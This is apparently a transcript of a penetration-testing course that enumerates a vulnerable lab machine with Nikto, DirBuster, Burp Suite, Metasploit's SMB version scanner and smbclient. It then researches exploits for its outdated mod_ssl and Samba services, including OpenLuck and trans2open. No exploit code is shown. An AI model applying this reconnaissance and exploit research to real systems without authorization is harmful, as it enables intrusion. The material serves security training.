reset rst doing that it's found a few open ports now it is our job to look up the information that we are seeing on these open ports and try to find exploits on them so that's what we're going to do and i'm going to cover in the next video we're going to go kind of step by step and i'll talk through the methodology and why i attack certain ports first what ports those are how we can enumerate those ports and then we'll enumerate everything get all the details down once we have all the details down we're going to move into the section of exploitation it's going to get really fun and we'll exploit this machine in multiple ways so from here just take apart or take that away from the lesson that you've officially successfully scanned this machine i encourage you to maybe go back and take notes or to go back and scan it again get the syntax down in your head keep typing this out remember it this is the one thing you're probably going to type out more than anything else and then also go through and look at the different types of options you have there if there's one that interests you just run it against the machine play around with it this is your lap time make the most of it so for now that's it in the next video we're going to start enumerating these ports so i will catch you over in the next video let's talk about the scan before we dive into any enumeration so the scan here we've got these open ports we've got 22 with ssh and we've got 80 and 443 which are hosting websites and then we've got 139 which has got a file share with samba on it and then you've got the 111 and 32 768 which are rpc and related to the smb so we need to think about point of attack as an attacker now when i see this scan i light up with 80 and 443 and i light up with 139 and sometimes you'll see 445 with it as well i light up from those because those are commonly found with exploits if we think back about all of the exploits that have been out there for a website for example or if we think to samba or smb related exploits just recently right now it's recording in 2019 in 2017 there was malware that went around called wannacry and that was based off of something called eternal blue also known as ms-17010 it was a pretty wicked exploit that utilized a flaw in smb smb has been historically bad and websites have been historically bad now when we see something like port 22 port 22 is ssh and historically it hasn't really been that bad now we can try attacks against it like brute force attacks we can try something like default credentials or root tour on it for example but when we look at it we can maybe enumerate the version but there's not usually what we call remote code execution on ssh remote code execution being that we can run an exploit against it and get something called a shell back and we'll talk more about that when we get into the exploitation section but for now just know that it's not really common to attack ssh so when i see ssh open we can do some things at it but when we talk about low hanging fruit and that's really what we're after as an attacker we're going to see what's juiciest first and kind of go from there so you'll develop your own methodology over time but i'm going to drill into your head at least my methodology why i do things and there will be several videos of walkthrough machines in this course so you're going to get to see this over and over and over and i'm just going to explain my methodology repeatedly so that you can get introduced to new tools and new ideas and ways of thinking so from here i do want to dive into my first thought process which is i want to investigate port 80 and i would either here i would do 8443 or i'd go right after 139 so we'll do 8443 and start working towards those now let's go ahead and just do the first step this is always my first step if i see a website i'm just going to go out to the website so i'm going to go ahead and just copy this here and i'm also going to go into the little hamburger and go to my preferences and i have not turned off my burp suite settings and it's possible that if you're just following along you haven't turned it off either so go ahead and just select use system proxy settings and we'll just say okay and now we should be able to navigate to our website i'll just open up a new tab just in case we'll do something like this good that worked and then we'll do the https version because there's also 443 you might get something saying your connection's not secure just go ahead and say advanced and add an exception here confirm it and you'll see this okay so what we have here on both of these is we have a default web page now when we talk about performing a network penetration test or even a web application penetration test if we see a default web page like this this is an automatic finding now why is this a finding it's is it exploitable no not really but it tells us a little bit of something about the architecture that's running behind the scenes and it tells us a little bit about the client's potential hygiene so if we see this well we know that it's running apache we know that potentially the box is running red hat linux and we're just getting ideas of what's going on behind the scenes more so if a client is running a default web page it brings up two questions one are there other web directories behind this so we'll show you something here in a second where we do directory busting and attempt to find a directory like say we're looking at this and we don't have anything to click on but we say you know slash admin maybe that directory's there okay are they hosting a website somewhere else that's just not at this ip address on this base or maybe they aren't hosting any website and they just left 443 and 80 open for no reason and put this default web page out there now when you think about that that signals to an attacker poor hygiene and i'm going to think to myself as an attacker if a company or client is willing to just put this out there willy-nilly what else are they doing what potential vulnerabilities might they have if they're doing this so this immediately signals for a hygiene we would write this up on a test and i'm going to show you guys my notes once we kind of get towards the end of the enumeration so make sure you're taking good notes and we can do that in like a little notepad here and kind of what we're doing i think this is useful and then i'll make a nice little keep note or you you can make a cherry tree and make your own notes out of this and i'll show you what it looks like towards the end of the enumeration but we can say something like 80 443 and then you can put the ip address and sometimes people like to put notes at like what time they did this so you could see up here it's 22 58 or 10 58 pm my time and we could take that and we can just say default web page and we can say apache and we could tell that it's running potentially php and we'll get behind this as well and we just have these little notes so we know that we navigated to it right at least this is part of the enumeration here and you don't have to timestamp everything i'm just giving you that for an example but we can see that it's running this default web page so we have a default web page there's nothing really for us to click on i mean we've got like the documentation we can go to like it looks like the manual might be here and this here we just clicked on a link and it was a bad link now this is also uh what's called information disclosure so this will be another one to bring up but we see here that we have an error page and this error page is saying hey it's not found now this is typical of what's called a 404 and when you see a 404 you think okay it usually redirects you to a page that's like hey we can't find this this is giving us a little bit more information than we should be getting we're seeing here that we're getting apache version 1.3.20 so now if we didn't know already we do know that we're running apache 1.3.20 and we've got a host name here keyotrix.level1 that is a internal information hostname right so we can get naming convention out of a client we could potentially know how they are utilizing naming conventions on their internal networks and we've got some version enumeration or information disclosure so this would be a screenshot as well that we would take a picture of and you can also notate that in your notes and say something like you'd say information disclosure and then you could say something like 404 page and then you would just have your your notes or a screenshot of this and then that would indicate to you what you can write up on the report and kind of where you found it so we can click around on this page or we can do a little bit of what i like to do which is vulnerability scanning so i'm going to introduce you to a another tool which is called nicto so let's open up a new tab we can close these two tabs out if you've got extra tabs like i do and this tool is called nikdo it's just like this so nikto is what is known as a web vulnerability scanner this is a great tool when you're learning the beginning stuff when you're practicing against vulner hub or you're practicing on a ctf or something like a hack the box which i haven't introduced to you yet but it will help you do vulnerability scanning against the website the issue is that if the website is running good security you might run into some issues with that and it might actually auto block it if it detects nicto scans not always very commonly that's not the case but if they've got good security or good web application firewall it might actually block these scans so you have to kind of be wary when you use it and really use your hunch if you think that this client is using a web application firewall or not and you'll really get a feel for the client just as you gain more practice and once you're getting in there and you're starting to notice vulnerabilities or not you'll kind of understand whether or not they're running something like that so from here we're just going to say nicto and you can always do a dash dash help but it's pretty straightforward all we're going to do is say a h for host and then we're just going to say something like https and then we'll just paste our our address something like this and that one did not work so let's go ahead and try http and see there we go for some reason it's not picking up the ssl on this so i'm not sure why it's not discovering but now we can see our scans kicking back and immediately we can see that it's doing some detections here it's detecting that the server apache 1.3.20 is running it sees this mod ssl with openssl it's giving us some vulnerabilities back it's telling us what is missing in terms of protections now these protection headers if we're doing an external penetration test not really that important if we're doing a web app penetration test these become more important but we don't have to worry about them right now so when we come through we keep looking and we see apache 1.3.20 appears to be outdated okay mod ssl appears to be outdated open ssl appears to be outdated these are all findings depending on how outdated it is a 1.3.20 to a 2.4.37 is pretty outdated so these would be findings that we would notate on a report as well we can look through and you can see what types of attacks this might be vulnerable to so one if you're looking through there's this apache here that says remote denial of service well typically denial service is out of scope when we're doing a pen test so we're not interested in that possible code execution so maybe interested in that we are also potentially interested in a overflow and rewrite and this one says this is vulnerable to a remote buffer overflow remote being important which may allow a remote shell so remote meaning we do not have to be local so i skipped over this one where you see local this one is remote meaning we can run that against a site sitting in our pajamas in our house and that site's running somewhere else and we can do this all remotely so immediately it's found potential vulnerabilities so we've got this potential mod ssl vulnerability and it's come down here and it's looking at some other things you could see that this trace method is active and we still haven't gotten into web apps so really don't need to talk about it too much but trace is potentially vulnerable when you have something like cross-site scripting which you see up here and that could lead to something called cross-site tracing but you kind of need both of those but again that's just informational at this point you don't have to really be taking notes on that so we're coming through it does a little bit of directory busting for us so what that means is it's just going to come through here and it's going to run like a a word list and that word list might have like admin usage manual right test.php it's got all these different items that it found doing this word list now we're going to do a little bit of directory busting here in a second so we'll save this scan and we'll keep this in our notes and we'll refer back to it here in a little bit but what we need to know is we can alt tab and we can get our text editor and we could say something about let's just copy and paste this line here that potentially this mod ssl is vulnerable so let's copy that and we'll we'll put that into our text editor and we'll make that as a note so we're still doing enumeration we're not gonna we're not gonna do any exploitation until we get to the exploitation stage so what we would do typically is we'll save this out to a file so you might want to like copy this all this right here to show what you ran and if i could copy that would be really useful so you copy this and you would just make maybe a directory and you could call this something like keoptrix and then we could cd into keopterix and then you could say g edit nicto.txt and then you have your nikto scan save so this is part of being a good pen tester is saving all of your scans and having them available in case you need to go back for notes so we'll save that and then what we're going to do is we're going to pause here we're going to call this part one and then we'll go into part two and talk a little bit more about directory busting and look at some other enumeration features that we have for this and then we'll start focusing on other ports and really enumerate this box thoroughly before we work on exploitation so i will catch you over in part two of this video and i'll see you when you get over there so now we're going to use a tool called dir buster to do a little bit of directory busting there are other tools out there that are similar or do the same thing there are two built-in tools in fact there's dirt buster and there's also a tool called derb and then there is a tool called go buster and you have a lot of options my option of choice is durabuster but i do recommend that you write these down and just explore them for yourself and see which one you like the best so i'm going to go ahead and run dirt buster and i'm going to run it like this with the ampersand at the end and it's going to load up this nice little interface and what we're going to do is we're going to say hey i want to run against this target url i'm going to go ahead just copy this right here and i'll tab back into it and syntax is important it's going to want the port 80 at the end you see the port 80 here with the slash and we're going to say go ahead and go faster on these threads and then we're going to go ahead and pick a list so go ahead and go to browse and let's go ahead and go to your base folder here go into your user your usr folder your share which is right here and then if you start typing word lists it'll bring up word lists right here and then you see dirt buster has its own folder right here so we're going to select durabuster and from here we can pick a variety of different lists i like to just use the small list if i'm not finding anything at all maybe i'll move up to the medium and out on the interweb is a large list as well let's just go ahead and start with small for proof of concept and so now let's break it down we've kind of talked about in the last video but let's just do a quick reminder what we're doing is we're going out to web directories and we're using these word lists and these word lists have hundreds if not thousands of different well-known directories so it could be something like admin or like cgi bin etc and it's going to go out and try to navigate to these it's also going to look for specific file extensions so we know that we're up against an apache website well apache runs php if we were up against something like a microsoft website which is iis well those tend to run something called asp or aspx and so this is why enumeration is important as well because we need to know what's running on the back end to find or make the most use out of it now what we can do with these file extensions and what i like to do is i like to run it against php or whatever the base of the server is but i also do like to run something like a text file something like a zip file and you can make this as long as or yeah as many as you want you could say rar pdf docx but the more of these that you put in there the more times it's going to search because it's going to search through the word list and say the word list has admin in it it's going to try admin.pdf or admin.zip so it's important to limit these to what you need for our sake i'm just going to go ahead and just use php and we're going to just scan with the default results here and just kind of see what happens so we'll go ahead and start that and this will kick off and start scanning and it's already finding right away it's finding some stuff you can see the list getting big and you can go to this results view where you can see what it's found and you can also go to this tree view here and see what it's found you can kind of click in you can see it's found some potentially interesting files we can go enumerate these as well and it's found test.php page you can right click on these and open in browser and you can see that it's found this print test here in php4 uh so we can look through some of these pages we're gonna go ahead and just let that go for now it's gonna take a minute it could take uh up to a while to scan depending on how big your word list is how many options you choose and how well your website is cooperating with your scan as well so from here i'm going to show you a few more things so let's go back to our preferences if you still have that open go ahead and go back and let's go ahead and just go to the settings and we'll go to our manual configuration and let's boot up burp suite and this is just another proof of concept that burp suite is your friend especially when you're looking at websites so we're going to utilize it just to take a peek i just want to see what's out there so we'll go ahead and just hit next and start burp suite here on this and while we wait another thing that i need to point out is if this were a website like a real website instead of a test page and a very important thing to do is view the source code so we can right click in here and we could say view page source and we can view the source code now what we're looking for in source code are any kind of comments potentially any kind of information disclosures we might be looking for any sort of keys or password or user accounts or anything that might be disclosed in a source code that should not be disclosed a lot of times when you do ctfs or you do hack the box or vulner hubs they hide little comments and source code but in a pen tester point of view we're looking for more important things like the passwords or keys etc so we've got burp suite open and we're just going to go ahead and intercept one request here and we're going to go ahead and just let this forward actually we'll send this to a repeater i'm going to show you a little trick go ahead and send this to repeater so you right click send a repeater and you'll see your repeater tab opens up here now the neat thing about repeater is that repeater will show you your response in real time and you can modify these so you could say hey i want to send this here or you could say something about like i want to send a post request maybe and let that run and you can see well it says okay method not allowed so it doesn't like that but you can send different results modify what you see here and see how that works for us now this is not taking this exactly so let's forward and see maybe if we're missing anything and we're not so another thing that we can do is we can actually copy this and what we can do is we go into the target here and we've got the target showing we could set the scope if we need to so we can just we can go to scope here and we can just say add and then paste this in here for http and we could do https for both but let's just do http and we'll just say yes and what this does for us is this limits only searching for in-scope items so we're going to just limit now and then we're going to go ahead and look at the response that came back and you see there's no response here but there is a 304 not modified and the interesting thing is look at the server header the server header is disclosing information to us as well and we saw this in the nicto scan it's all coming back around right we saw the nikto scan say apache 1.3.20 and it pulled down this server header this is why it's so useful and this in itself a screenshot of this right here is information disclosure as well so this client that we're working on has a little bit of information disclosure problems and we can just say information disclosure here and we'll do something if i can type disclosure here we'll say something like server headers disclose version information and we'll take a screenshot of that and we'll put that in our notes as well so we're going to get really deep into burp suite once we get to the web app section i just like to get you utilizing it and familiar with it and just so you're comfortable by the time we get there we're going to use it a few more times when we talk through network items and then once we get to the web app it's going to be a lot of burp suite so we get very comfortable with it very quick so let's take another peek at our dur buster and see how that's working and you can see that it still has 23 minutes but i really just want to put you through the concept of it the concept of it here is that we are looking for any sort of interesting directories and you can see response codes here as well if you've never seen a response code just know for now that 200s 200s mean okay 400s mean there's some sort of error most typically like a 404 means page not found and a 300 is typically a redirect and then there's 500 which are like server errors or other so what we're going to come in here and do is just kind of peek at these and we can just kind of open these and see icons probably not that interesting doc has nothing in it right now the manual is not going to be that interesting to us neither is usage uh maybe maybe usage is interesting let's open one of these in the browser and we can see what's kind of running and if you have your proxy on go ahead and turn your intercept off you see mine caught there okay and now this is an interesting page here we can see usage statistics and this might give us a little bit of information disclosure if we're able to access it at least here well we can see a couple things we see webalizer version 2.01 so we can copy this and see if there's anything about this here on this machine that maybe is exploitable so let's add this here as webalizer version 201 and we'll just put it like on this usage.html now we don't know for sure if this is running out on the web or if this is just an html page that has been generated by something else so not for certain that it's actually running on this it could just be something they have in this usage folder but it's always good to notate what kind of items they might be using and they're utilizing this webilizer for sure at least in their network again this is probably a little bit of information disclosure or information leakage here so they've got a a consistent problem with that so let's go ahead and look more at the results and mrtg is in here and we can come through here and just look like what's mrtg and we can open that in the browser and it says what is mrtg this is multi-router traffic grapher okay and we could scroll through this read the details and we can keep going through here and this could very well be a rabbit hole but this kind of makes sense and there's a web server here there's a log file let's view the log file nothing nothing unique there let's view the web server let's see if it's the same page and it's a little bit different but not not entirely different so it's possible what we're seeing here is that what we talked about in the part one of this video which is that we're seeing the test page is out there and why was it out there right is it poor hygiene it's still poor hygiene even if they're running a web server but they are running a web server here on the back end whether this web server is useful to us or not really don't know so the goal through this is to dig and this is my challenge for you is to dig kind of through these results that you get back so wait until your your scans finish here and dig through the results look at all these to me right now it doesn't look that interesting but again we haven't fully enumerated the real enumeration would be to go through each and every one of these and determine if there's anything of value here is there any sort of service information that could be useful etc so where we're at on the web ports at the moment again as a recap we have our scan back right and we've seen eighties open and running apache 1.3.20 we see 443's got the same we also know about the mod ssl 2.8.4 and open ssl 0.9 0.6 b doesn't hurt to copy this and put this in our notes too because i think that's pretty useful we've got that here let's just go ahead and maybe put something up above just as a note and we ran our nicto scan and we saved this to our for our notes so when we go write a report we have it ready and we've got some information here that we've written down as well so it appears that there are some potential vulnerabilities here but we won't know until we start digging into google okay and that will be very very important but we're going to get to that when we start getting into the end of this little series here and then we get in transition into the exploitation part of the series we'll work on exploiting these so this is just a few tricks on how you can enumerate websites and when we're coming through and showing you these ports and we go over all these ports that we see we're going to come across new ports when we do pen tests and what what it comes down to is just having a methodology you might discover a new port and as long as you have a methodology that's all you need so we're going to work on building that methodology and you might find other tools for for searching websites that you like you might say hey i hate your methods or you know these tools just work better for me and that's absolutely fine as long as you're developing your own methodology so just start thinking about when you see a website what are the basics that you're looking for when you come across the website you're looking for service version information which we have here you're looking for any sort of maybe back-end directories you're looking for source code you're looking for potential vulnerability scanning with nicto and any sort of information that you can divulge same thing we can come back here we talked about it before with wapalizer you can click on wapalizer and see a lot of the same things that we saw it knows the operating system it knows the web server extensions and it knows what's running on the back end so there's a lot of useful information here and this is all we are after at this point we just want to scan and enumerate and then we're going to dig deep in exploit so that is it for this we're going to move on to the next port in this section we'll do a little bit more enumeration see what else we can uncover so i will catch you over in the next video now that we've taken some time to enumerate web pages on port 80 and 443 we're going to go ahead and shift our focus over to smb on port 139 so if you are unfamiliar with what smb is smb is a file share so think about your work environment if you go to work and let's say that you have a drive you access that's not like your common drive like a c drive maybe it's like a z drive or a g drive and you access that that drive to get files and you can upload the files download the files and then maybe some of your co-workers can also see that file share and that's why it's called a file share another example is say you have a scans folder and you go to your printer and you scan something and magically it appears in your scans folder on your computer that's another example of smb so smb is commonly used in work environments and internal environments so when we see it we we think internal and we think about all these exploits that we i've mentioned in the past with especially with latest and greatest being ms17010 and even though it's two years old it still shows up and it's gonna show up again in this course later on so we're gonna do is we're just gonna take a quick look at our scan and see what we have available to us so on port 139 here we see that okay netbios smb work group my group not really a lot of information we could scroll down and the great thing about the dash capital a that i had you run with this scan is that it does run scripts for us so these scripts that we're running go out and do a little bit of enumeration or additional enumeration and here it came through and it's pulling down some information we could see that okay the net bios name of this is called captrix well we kinda already knew that but and we can see here that it's running smb version two we really don't know that for sure or what smb version it's running exactly so that's really important because the type of smb version that's running could potentially lead to an exploit and we need to know that kind of information so we're going to look for version information the other thing is we're going to try to connect to this machine we're going to see if there's any connections available to us and if we can make that connection if we can get to the files on the share and see if there's anything potentially malicious or that we could do potentially malicious so let's go ahead and let's get into a terminal and we're going to load up a tool that you're going to be intimately familiar with by the time this course is over and that tool is called metasploit so to run that tool just go ahead and type in msf console like this and hit enter now metasploit is a exploitation framework and it does a lot more than exploitation as you can see down here you can see that it does exploits what are called auxiliary modules now auxiliary modules is like scanning and enumeration so we can actually do port scanning we can do all kinds of information gathering with these auxiliary modules they're awesome we're going to go through one right now there's also these post modules which do post exploitation so say we get a a shell and a machine which means we've exploited a machine we can do some things in post there's all different types of payloads which we're going to cover when we get into the exploit section and then the rest of this you don't have to worry about that for the scope of this course but we will be seeing another tool by metasploit which is msf venom later in the exploit development section of the course because we're going to utilize that to build payloads out for our own shells so what we're going to do for now is we're just going to introduce this slowly don't feel overwhelmed it's just a little bit of a learning curve when it comes to learning all the features that it has available but it's second nature once you learn it and it's going to be one of the most commonly used tools that you use as a tester in the field so we're going to go ahead and just search for smb here and i'm going to do this the terrible way we're just going to search smb and you can see that there's 121 results now that's going to be quite a pain to sift through but what we're after and say we we didn't know much but we were trying to see if hey maybe does metasploit have any kind of modules i don't know for smb enumeration well we know auxiliary modules are enumeration and we can look right here in the front and see what type of module it is so you see this is a post module and you see we can scroll up and we're going through exploits and then we're going to go up into auxiliary now the second part of this is the type of of action it's doing so you can see auxiliary denial service auxiliary fuzzing auxiliary scanning gathering and we're going to utilize this to our advantage so we're going to take a look at the syntax now what we are after is smb version information and if we look kind of through this we can come down to scanner here and you can see it's looking smb1 2 gpp which we're going to talk about ms-17010 which we've talked about you have an auxiliary scanner to see if there's anything out there with that vulnerability and if we look right here on number 60 auxiliary scanner smb smb version now this is a bit of a long convoluted way to do this go ahead and copy this by the way or memorize your number i'll give you two options this is a long way to do it but i wanted to show you this way of doing it because you're gonna get better at it but you know when you see something on a scan result and you don't know a lot about the tool the best thing that you can do is just say hey you know i know metasploit does things like this let me see if maybe they have any sort of enumeration or exploitation it never hurts to use search feature to try to look up items and learn about them so let's say we've never used this before we're going to go ahead and just say use and then we're going to paste this module in here your other option is instead of pasting this module you can put the number that you had so like for example 60 you could say use 60 and it will also load this module so go ahead and hit hit enter for that and you can see here that it says now we're in auxiliary module of scanner smb smb underscore version so from here it's always good to type out info and see what info is available and just tells you a little bit about the module that you're running so here you see that this is going to display version information about each system perfect it's an smb version detection that's really what we're after right now so this is great and we have options here these basic options now you're going to see me do this a lot you can go right into options by just typing options and just see that instead of printing out all the long stuff if you don't want to so in our options we're presented with some items we've got something called our host now our host is what stands for remote host you're also going to see an l host later on which stands for localhost our host is always the victim that's who we are attacking this is the target address you might see our host or our host plural our host means you can only import one host if we have our hosts plural we can use cider notation meaning that we can put slash 24 and try to sweep a range for example but in this instance we're only attacking one machine anyway the rest of these smb domain password and user if we knew the domain password and user in this instance we could fill it out and try to get a little bit more information but we are unauthenticated we have no credentials at this point so we're just going to go ahead and just put into our host which is required and not fill out any of the non-required fields here and what we're going to do is we're just going to say set our host and this isn't case sensitive i just like to type it out case sensitive and then the ip address of the machine that you're going to scan so we're going to say 192 168 minus 57.139 and then i'm just going to type in run give you a second to catch up and run okay i totally lied my ip address is 139 the machine i'm after is 134 and run your screen should look something like this i'm over here instead of copying pasting trying to memorize so hopefully you can see that i make mistakes too so here we are we see a little bit more information and it might not look like a lot right now but knowing the samba 2.2.1 a is very specific and this is going to help us out quite a bit so let's just copy this guy and let's open up that text editor we've had going and let's just come in here and maybe make some notes or just put it in here and say something like smb and then we can just put paste that we know the version now and this is going to become important when we start doing research on what we've found so we found all these different type of versions running up here and we're going to do research on exploitations against them but we're also going to do research on this and exploitations against this so as much detail as we can get that's what's important and what's going to set you apart from other hackers or other people even trying to break into the field is your ability to information gather and your ability to enumerate if you can do both of those the exploitation is actually the easy part in my opinion so we've got the version information that's great we're going to use a new tool now so go ahead and go file new tab and i'm going to go ahead and show you a tool called smb client now smb client is going to attempt to connect to the file share that's out there now if we have the ability to connect to the file share with anonymous access what that'll do is we can get in there and we can potentially see files now these files might give us an ink link of what's going on the network or they may even be you know valuable to us they might be something like a backup file or password stored in a text file you never know what you're going to find until you actually look so what i'm going to go ahead and do is do a dash l and that's going to be to list out the files and then the syntax looks something like this you can do two backslashes i like to do four it really doesn't matter and then you just type in the ip address of the machine that you want to try to connect to so 192 168 57 134 for me and then two more slashes like that if you're running it with just two slashes you don't have to put any there so this is just character escaping because we're in linux so go ahead and hit enter and you see that the server does not support extended security okay don't worry about that anonymous login successful go ahead and hit enter on root password because we don't know it and you can see that we did list out a file share so let's go ahead and try to connect a different way let's tab up and let's delete this dash l and we see that there's two file shares there is an ipc dollar sign and an admin dollar sign the ipc is not really usually valuable to us but the admin would be really valuable if we could connect to that so let's go ahead and just paste that in here and see if we can get that connection okay let's try this hit enter and you can see we have wrong password so it's not going to let us connect to this share with anonymous access so that's unfortunate we could also try proof of concept to see if ipc works hit enter on that and you can see now we're actually in this and this is interesting so we could say help to see the list of commands and it's very similar to being inside of a linux machine now we can do something like ls to list the files and we're actually access denied here so this is what we call a dead end we can't really access this so we don't have any information extra gathered we're going to come back to this time and time again with smb client this isn't the last time you're going to see it in the course but i want you to know that it exists in the reason behind what we're doing here and this is some of where the information is coming from in our scan we're trying to connect out we see the server names captrix there's a comment that it's a sama server and we're going to try to come in here and connect to a file and maybe get lucky but this time we we didn't get lucky so we're just gonna go ahead and exit out so that's all you need to know right now for smb smb is an amazing protocol when i see smb i get very happy but we're going to focus on that very heavily when we get into the internal part the active directory portion of this course because that's when things get really juicy right now we're just going to do keep it simple stupid on a lot of this stuff it might feel really easy or very very straightforward depending but i promise this is just going to keep building and building and building until we have a pretty big understanding in this and there's going to be a lot of repetition and a lot of practice and i think that's the best way to learn so from here i'm going to do a brief enumeration on ssh how we can do enumeration with ssh and then we're going to talk other items of enumeration and talk research what are we doing we've been collecting all this information and putting it into a text document you're probably like so what what can we do with it and that's where things get exciting and that's how we start to lead into exploitation but we got to do a little bit more research first before we can get there so that's it for this video i'll catch you over in the next video when we are enumerating ssh so now let's take a look at ssh so from the original scan we saw that it was open and we saw open ssh 2.9 p2 so we're going to copy this and just make a note of that in our notes as well i think that's important so we'll just say ssh we've got the version there so let's take this and let's do a little bit of enumeration and talk through it so sometimes you're going to get a scan back and your scan is not going to have really a version here it's just going to say ssh and we can go and try to find that out ourselves and it's always good to attempt that what we're going to do is we're going to attempt to connect to ssh to this specific port and see if it gives us any information about what's running and that's really it at this point it's that's most of the enumeration that we can do anything with ssh the second that we attempt to make a login attempt is going to be exploitation even if we just try one password guess that's exploitation so we're not going to do that right now we're going to save that for the exploitation part of the course but i do want to show you a connection and just something funky with this anyway so let's go ahead and just go to our terminal and the typical way to ssh if you've never done it before is you just say ssh and i want to ssh to a specific ip address so this is the ip address i want to i want to ssh to the issue with this box is this box is old so when we go to try to ssh to it it's going to say this hey we haven't found a matching key exchange so they they're giving us a few different offers here we're gonna have to type in a little bit of syntax this is not common but this is also useful to have in your notes because this does come up occasionally so we can just say a dash o and we're to type kex like this and then algorithms equals plus sign and i'll stall for just a second so you can catch up and then i'm going to copy this one here and then i'm going to paste it and you're going to see we're going to get one more error and this is going to ask about a cipher so it says there's no cipher found we're going to do a dash c for cipher we're just going to copy this and we're going to paste it and this should now provide the opportunity to connect it says the authenticity can't be established we've got an rsa fingerprint do you want to connect we're going to type in yes okay and what's happening here is asking us for a password there's nothing here for us so i'm going to hit ctrl c why did we do this why do we even attempt to make this connection well sometimes what happens is a banner is exposed and the banner will say hey we're running we're running ssh version xyz and this is built by this person by this company etc so here we're looking for a banner unfortunately there was no banner so that doesn't give us a lot of information but fortunately for us when we had our our scan here we were able to pull down at least the open ssh 2.9 p2 so that's it and i told you in the beginning ssh isn't very exciting because there's not a lot of opportunities for like remote code execution really the way we're gonna have to do this is hammer it with brute force and we'll talk about the reasonings why later but we'll have to hammer with brute force and just pray spray and pray as we like to call it sometimes but for now that's it for ssh so we're gonna start moving into research different tools we can use to research vulnerabilities and additional videos on that so i'll catch you over in the next video we start digging into some of what we found let's talk now about identifying and researching potential vulnerabilities so we have our notes here and all i've done is move them off of notepad and into cherrytree because cherrytree is a bit more visual and bigger font for us on video and i made two nodes i made the main node here of notes and then i made a child node here of vulnerabilities so if we recall from our nodes we have 80 and 443 and we've identified some findings that we're going to write up on a pen test report and those findings are you know a default web page 404 page was giving a little bit of information disclosure and the server headers were disclosing some information as well on top of that we've identified some information that we need for research now we've got 80 here and on port 80 we've got this apache this mod ssl and this open ssl that we could research and when we ran our nicto scan we identified something potentially juicy here where mod ssl 2.8.4 falls in line with this which is 2.8 and 7 or lower which we are are vulnerable to a remote buffer overflow which may allow a remote shell remote buffer overflow meaning that we are don't have to be local we can be remote which we are and we can gain access via a remote shell meaning we can gain access to that machine so that's good that's really good the other one here we see is smb and we identified samba version 2.2.1 a we also identified a webalizer version 2.01 and we've identified open ssh 2.9 p2 so for this video we're going to target the low hanging fruit and i put this in order of how i would attack it now again i always think 80 443 and 139 445 are the juiciest to me this webalizer might be juicy open ssh probably not that juicy so we're going to do is i'm going to go ahead and research 80 and 443 and then we'll research the smb as well and then i'll leave you to do a little digging on these just as practice and we can see where we go so from here we're just going to go out and open up firefox and we'll go out to google and on google we can pick and choose which one we want to research here now this mod ssl 2.8.4 is probably the juiciest of the items and we might want to start there so let's just say something like mod ssl 2.8.4 you see the 2.8.7 exploit showing up by the way we'll just do 2.8.4 exploit and we'll see what comes up now naughty words naughty words we'll just call it open luck okay and you can see don't cheat chiatrix is coming up as well but we're gonna go ahead and just open this uh open this apache mod and then we're gonna also open this github one and i'll cheat a little bit and tell you why here in a minute so apache mod ssl 2.8.7 less than 2.8.7 scroll through here and it just has the code for us now this is where you have a chance to come through and read the code now it looks like to me that they're just identifying if you've never seen a buffer overflow which you probably haven't there will be one later in the course it's identifying where it's going to have the architecture right so the architecture has its own identifier so depending on which it looks like this works for quite a bit of different architectures of linux depending which linux you're running is this return address here so that's all this is doing and then there's going to be code down here i'm guessing for an overflow which you see a bunch of a's as you're going to see later in the course this just overflows so you'll learn to read this over time again like you do not have to code this you do not have to be uh you know you don't have to be super good developer but just understanding kind of what's going on and making sure that you know the code that you download is safe on your computer and it's good to go now this is coming off exploit database so you can um i wouldn't say assume but you can trust it for the most part that this is safe code you have the option here to download the exploit and you actually have the option to download the vulnerable app as well if you ever want to build out a machine and play on your own um so we have a little bit information here that it just says hey you know this is less than 2.8.7 open ssl and we've got a remote buffer flow there's nothing else here but that's okay that's you know this might be good for us this is something that we need to note so we can copy this and i would put it here and we could just say something like 80 443 potentially vulnerable to we'll call it open luck and then we'll just put it here and we'll also we should also um save this open look and i'll cheat a little bit and tell you guys why is because this open uh the the exploit database one without uh saying bad words is not going to allow us to work it's not going to work um the the exploit's a little dated and that's why there is a github one out there that actually does work so we're going to utilize the github one instead when we do get to the exploitation section so a little bit of a hint a little bit of a foreshadowing we are going to utilize this exploit so we could also go in and research we could say apache httpd 1.3.20 copy that and come to google and just say hey i wonder if there's an exploit for that and you would just search something like this and you can see in here apache 1.3.20 is actually showing up in this vulnerability as well so that's good and then sometimes we see these websites like this cve details these are okay to look at uh they're they're all right like you come in here and what you want to look for is the score immediately my eyes shift to the score i don't care about anything else if i see something that's red i get excited um but we see no red here so i don't think that necessarily this is vulnerable to like a remote code execution it's got a lot of denial of service but i would want to see like a high score which means a critical that's what red is red is critical so we've got high moderate and low here but we don't have a critical one so this doesn't look like it really probably has anything but it is tied to this which is another wheel spinning indicator here that hey you know what we probably got an exploit here with this thing or at least something that we should try and that open ssl is tied directly to this mod ssl so we don't really have to research it now let's move on to samba here samba 2.2.1 a let's copy this and let's check for an exploit so just as simple as is doing this and saying exploit and we've got a few here we've got this samba 2.2.8 remote code execution we've got samba 2.2.x remote buffer overflow and we've got one down here which i love to see this is rapid7 so let's go to rapid7 first why do i like to see rapid 7 well rapid 7 makes metasploit so it looks like this exploit is called samba trans 2 open and let's read a little bit about the description so it says this exploits the buffer overflow found in sam versions 2.2.0 to 2.2.8 that meets our criteria this particular module is capable of explaining the flaw on x86 linux systems that's important to know that do not have the no exec stack option set note some older versions of red hat do not seem to be vulnerable since they apparently do not allow anonymous access to ipc so remember we did get anonymous access to ipc earlier when we connected to it via vr our smb client we never got access to admin we could never do anything in ipc we tried to say ls and it said denied but we still logged in so we do have anonymous access to ipc that's interesting and we are potentially running against an x86 linux system so that's interesting as well it looks like we're potentially meeting some of the requirements here now here is where this is great you scroll down here and you see module options and look this is metasploit it gives you the module options it says hey use exploit linux trans to open and then it tells you hey how to do this and then you're good to go that's really nice i really like that so i'm going to copy this one and we'll just come to our notes and we'll say something like 139 potentially vulnerable to trans to open and we'll just paste a link here and we can come read these as well so this is the trans to open overflow here this looks like the manual version of trans to open overflow it looks like it is a pearl script and again it looks like an overflow um so you'll learn to read these and see what they look like just over time but you know you just want to look at the code make sure everything's good to go you will need to run this with pearl it gives you the options here trans to root perl what option to select what target type to select your ip address and your target iep address so we'll save this one as well why not and we'll take a look at the other one just see what it is and it looks like it could work for us remote root exploit for samba 2.2.x that works against all linux distributions samba.c i think this is a possibility as well so this is c code here we're going to go ahead and just copy this and we'll go ahead and add this to our list as well and we'll figure it out so all we're doing right now is the research okay so from here i've showed you the google way let's say for some reason you want to do this 